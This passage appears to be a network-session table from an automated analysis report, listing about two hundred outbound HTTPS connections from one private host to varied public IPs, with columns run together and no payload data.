                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11963192.168.2.1436010189.63.32.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11964192.168.2.144193827.227.114.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11965192.168.2.1441526143.225.117.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11966192.168.2.1448768217.4.2.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11967192.168.2.143391494.3.72.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11968192.168.2.144214691.182.220.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11969192.168.2.146065841.184.230.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11970192.168.2.1433896170.225.97.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11971192.168.2.1459904181.211.138.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11972192.168.2.1436992103.216.191.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11973192.168.2.1443810172.85.170.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11974192.168.2.1456950208.202.166.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11975192.168.2.144515261.64.167.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11976192.168.2.1439696119.169.232.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11977192.168.2.14361169.229.246.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11978192.168.2.1458948203.143.4.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11979192.168.2.1436262102.83.178.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11980192.168.2.1447934187.8.61.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11981192.168.2.145321052.156.114.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11982192.168.2.1435916130.178.154.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11983192.168.2.143878470.183.51.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11984192.168.2.1443938157.188.236.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11985192.168.2.145483891.150.152.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11986192.168.2.143741019.199.193.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11987192.168.2.1437762117.162.128.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11988192.168.2.145619244.33.102.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11989192.168.2.144806676.240.45.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11990192.168.2.144852068.39.240.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11991192.168.2.1448808222.51.79.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11992192.168.2.1446110184.154.14.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11993192.168.2.1444314166.75.184.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11994192.168.2.1447548159.203.253.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11995192.168.2.1458342125.60.27.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11996192.168.2.1438614110.172.108.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11997192.168.2.145000079.209.176.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11998192.168.2.1435852121.0.24.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11999192.168.2.145065019.36.190.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12000192.168.2.1453754117.171.191.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12001192.168.2.144814652.37.165.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12002192.168.2.1456090102.81.140.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12003192.168.2.144260687.194.189.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12004192.168.2.1459312212.213.247.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12005192.168.2.144836242.41.225.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12006192.168.2.145782264.217.119.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12007192.168.2.1436242222.200.141.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12008192.168.2.145051250.207.9.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12009192.168.2.1446170114.126.2.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12010192.168.2.143771652.152.224.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12011192.168.2.1457894116.164.251.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12012192.168.2.14579309.64.8.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12013192.168.2.1447902193.81.148.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12014192.168.2.144513446.183.13.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12015192.168.2.1455198142.202.229.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12016192.168.2.1442340118.147.92.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12017192.168.2.1434542206.145.126.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12018192.168.2.144477249.189.179.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12019192.168.2.1433340157.6.152.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12020192.168.2.1460978105.36.118.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12021192.168.2.1452088102.121.15.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12022192.168.2.1435474220.103.125.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12023192.168.2.144793854.153.109.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12024192.168.2.145428883.97.16.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12025192.168.2.1442580148.49.37.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12026192.168.2.1445408165.173.240.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12027192.168.2.1447652209.225.73.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12028192.168.2.1453140197.40.40.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12029192.168.2.1444834193.18.11.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12030192.168.2.1456204191.2.68.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12031192.168.2.1460552167.55.206.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12032192.168.2.145878819.219.45.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12033192.168.2.143621649.251.192.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12034192.168.2.144738843.98.3.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12035192.168.2.144869425.215.226.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12036192.168.2.1456608120.84.81.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12037192.168.2.1453220174.118.225.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12038192.168.2.1460032144.191.11.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12039192.168.2.143467635.81.158.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12040192.168.2.1453696195.43.69.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12041192.168.2.1434826111.229.127.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12042192.168.2.145824413.45.204.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12043192.168.2.145368261.17.108.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12044192.168.2.1451332100.127.248.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12045192.168.2.143991880.117.115.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12046192.168.2.145601061.167.182.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12047192.168.2.1451420167.250.223.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12048192.168.2.1443620110.171.191.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12049192.168.2.145732872.233.92.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12050192.168.2.1457150217.173.77.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12051192.168.2.1445360150.142.145.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12052192.168.2.14560541.29.113.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12053192.168.2.1445242171.162.148.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12054192.168.2.1436862213.123.160.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12055192.168.2.144824646.140.14.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12056192.168.2.145824431.163.207.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12057192.168.2.144671452.141.107.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12058192.168.2.144440062.217.52.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12059192.168.2.1442030190.212.93.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12060192.168.2.143821413.146.133.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12061192.168.2.1456356122.15.115.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12062192.168.2.144910489.218.127.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12063192.168.2.1455420146.7.65.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12064192.168.2.1450594130.155.37.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12065192.168.2.143288489.88.89.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12066192.168.2.1443216109.237.186.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12067192.168.2.1460056193.63.80.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12068192.168.2.1460318201.166.94.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12069192.168.2.144651862.177.72.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12070192.168.2.143865067.62.174.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12071192.168.2.145098234.209.251.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12072192.168.2.145455048.159.254.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12073192.168.2.14334405.112.141.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12074192.168.2.1460702184.132.47.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12075192.168.2.1439598201.225.156.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12076192.168.2.144572644.115.178.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12077192.168.2.145442270.119.60.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12078192.168.2.145385898.139.55.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12079192.168.2.1442298126.144.134.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12080192.168.2.144211299.147.129.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12081192.168.2.145166860.95.48.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12082192.168.2.1444932151.213.99.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12083192.168.2.1452304191.90.55.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12084192.168.2.144704832.198.85.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12085192.168.2.143286276.68.11.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12086192.168.2.1433626213.8.207.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12087192.168.2.1437318151.195.53.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12088192.168.2.1437264140.197.215.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12089192.168.2.1434670126.181.151.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12090192.168.2.1439852158.252.139.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12091192.168.2.1446052190.24.1.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12092192.168.2.146018839.26.139.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12093192.168.2.1437816219.65.231.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12094192.168.2.143619878.74.150.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12095192.168.2.144855877.219.212.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12096192.168.2.1445656138.235.170.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12097192.168.2.143436691.116.234.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12098192.168.2.1454456171.210.203.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12099192.168.2.144077478.54.171.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12100192.168.2.1442810212.121.235.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12101192.168.2.1453424151.106.119.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12102192.168.2.144300681.42.163.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12103192.168.2.144341260.245.140.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12104192.168.2.144389824.70.10.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12105192.168.2.144752634.253.18.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12106192.168.2.1455124216.222.11.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12107192.168.2.1441444173.232.213.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12108192.168.2.144851693.198.128.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12109192.168.2.143307699.93.129.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12110192.168.2.1445778100.136.167.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12111192.168.2.144318668.34.81.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12112192.168.2.145943297.44.156.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12113192.168.2.145434099.191.204.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12114192.168.2.1434110169.187.143.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12115192.168.2.1447106129.252.49.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12116192.168.2.1446934131.143.171.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12117192.168.2.143894298.80.46.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12118192.168.2.14351468.88.204.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12119192.168.2.1456812178.165.113.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12120192.168.2.145748642.249.11.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12121192.168.2.145842058.187.65.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12122192.168.2.144024070.48.35.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12123192.168.2.1435596192.204.162.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12124192.168.2.1446476126.160.156.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12125192.168.2.1455258184.110.21.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12126192.168.2.1443972197.158.12.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12127192.168.2.1439586109.176.139.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12128192.168.2.1447084201.67.97.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12129192.168.2.143565465.148.94.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12130192.168.2.145454417.234.135.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12131192.168.2.144942612.37.100.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12132192.168.2.1460436107.185.121.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12133192.168.2.1442796116.162.52.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12134192.168.2.144969845.85.15.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12135192.168.2.143416049.15.110.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12136192.168.2.1439078204.108.47.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12137192.168.2.1435180205.183.177.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12138192.168.2.145190092.158.134.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12139192.168.2.1449850134.171.57.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12140192.168.2.1446990146.146.52.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12141192.168.2.1435322192.218.241.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12142192.168.2.145358463.89.36.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12143192.168.2.144687219.143.74.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12144192.168.2.143566882.249.65.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12145192.168.2.1447200158.162.34.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12146192.168.2.1457914199.4.98.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12147192.168.2.1435256210.41.198.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12148192.168.2.1460714103.42.154.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12149192.168.2.1443428222.70.246.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12150192.168.2.1437458108.56.254.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12151192.168.2.1442802189.39.244.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12152192.168.2.143801677.95.252.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12153192.168.2.145039282.220.17.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12154192.168.2.143426061.120.96.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12155192.168.2.1452848147.154.114.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12156192.168.2.145578012.68.124.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12157192.168.2.144540695.145.9.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12158192.168.2.1438322176.235.85.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12159192.168.2.143995294.72.104.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12160192.168.2.1443186131.145.82.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12161192.168.2.1452114139.34.156.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12162192.168.2.1439786114.237.187.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12163192.168.2.1452270159.137.239.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12164192.168.2.145701282.13.188.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12165192.168.2.144978020.36.84.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12166192.168.2.1440436144.114.242.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12167192.168.2.144206068.191.83.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12168192.168.2.1447480196.11.146.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12169192.168.2.1454244211.84.61.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12170192.168.2.1435660142.255.74.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12171192.168.2.1434814185.133.59.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12172192.168.2.1460228168.195.188.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12173192.168.2.1438906158.237.185.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12174192.168.2.144167632.181.102.42443
                                                      TimestampBytes transferredDirectionData


